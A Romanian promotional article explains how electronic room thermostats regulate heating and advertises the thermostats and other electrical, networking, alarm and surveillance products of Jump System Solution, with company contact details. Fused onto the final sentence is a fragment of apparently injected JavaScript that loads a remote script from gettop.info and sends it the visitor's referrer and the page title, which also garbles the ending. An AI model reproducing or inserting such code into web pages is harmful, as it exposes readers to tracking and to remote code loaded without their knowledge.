Iarna se aproprie cu pasi grei si din cate se pare anotimpul rece va fi unul destul de indelungat si geros. Daca vrei ca iarna sa nu te surprinda atunci cu siguranta trebuie sa faci anumite pregatiri pentru a asigura caldura caminului tau si al familiei tale si pentru a te putea relaxa linistit si fara griji chiar si in timpul celor mai geroase nopti sau dimineti. Astfel indiferent de sistemul de incalzire cu care casa dumneavoastra este prevazuta, caldura ambientala trebuie setata si mentinuta prin intermediul termostatelor de camera.

Termostatele de camera pot fi de diverse modele, dar cele mai recomandate sunt cele electronice. Acestea furnizeaza solutii optime, prompte si durabile pentru mentinearea unei temperaturi constante in camerele in care sunt instalate. Dupa cum am precizat deja in liniile de mai sus, termostatele electronice de camera pot fi utilizate indiferent de sistemul de incalzire instalat in casa sau apartamentul dumneavoastra. Dupa cum stim, cele mai utilizate solutii termice sunt centralele termice (pe gaz, curent sau lemne) dar sa nu uitam nici de panourile radiante ce fac posibila renuntarea la utilizarea gazelor naturale in detrimentul curentului electric. Aceste panouri au si efecte terapeutice importante, dar scopul prezentului articol nu este acela de a trata sistemele de incalzire existente pe piata de profil din Romania.

Ceea ce ne intereseaza este termostatul de camera electronic. Ei bine acesta se poate instala atat pentru centralele termice cat si pentru panourile radiante electrice. Termostatele sunt puse in fiecare camera in care se doreste controlul asupra temperaturii. Apoi, utilizand meniul acestora se seteaza o temperatura etalon. In cazul in care temperatura ambientala scade sub etalonul impus centrala va intra in rol furnizand mai multa caldura. Similar,daca temperatura camerei este peste cea etalon, centrala va intra in regim stand-by. Dupa cum puteti observa, termostatele electronice de camera sunt solutii pentru economisirea consumului de energie sau pentru gestionarea acestuia intr-un mod inteligent.

In cazul in care doriti achizitionarea unui termostat electronic de camera, va recomandam produsele comercializate de compania Jump System Solution. Jump System Solution va pune la dispozitie termostate ce sunt alimentate pe baza de baterii clasice si care vin cu suport propriu de prindere pe perete. Termostatele pot fi alese in functie de mai multe culori sau modele si sunt rezistente, au aspect modern si detin cel mai bun raport calitate / pret de pe piata de profil din Romania.

Compania va pune la dispozitie serviciile unui magazin online astfel puteti comanda termostalele electronice de camera Jump System Solution chiar din fata calculatorului, tabletei sau telefonului dumneavoastra. Printre produsele comercializate de Jump System Solution amintim: articole electrice (intrerupatoare si prize compacte, intrerupatoare si prize modulare), elemente de retelistica (routere, switch-uri, placi de retea), sisteme de alarme (sirene pentru interior si exterior, senzori de fum, avertizor pentru inundatii), precum si sisteme de supraveghere video (camere video pentru interior si exterior, camere video disimulate, DVR-uri, placi de captura), dar si multe aletele. In cazul incare doriti achizitionarea unui termostat de camera electronic, nu ezitati si consultati lista produselor oferite de Jump System Solution.

Jump System Solution, contact:

S.C. JUMP S.R.L.
CUI: RO15162035, Reg. Com: J21/23/2003,
Str. Tipografiei, Nr 64
Slobozia, Jud. Ialomita
Telefon:
0722191370

Fax:
0343814198

In momentul in care veti contacta firma, mentionati ca ati gasit compania pe site-ul zoom-biz.ro, pentru a obtine cel mai bun pret.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;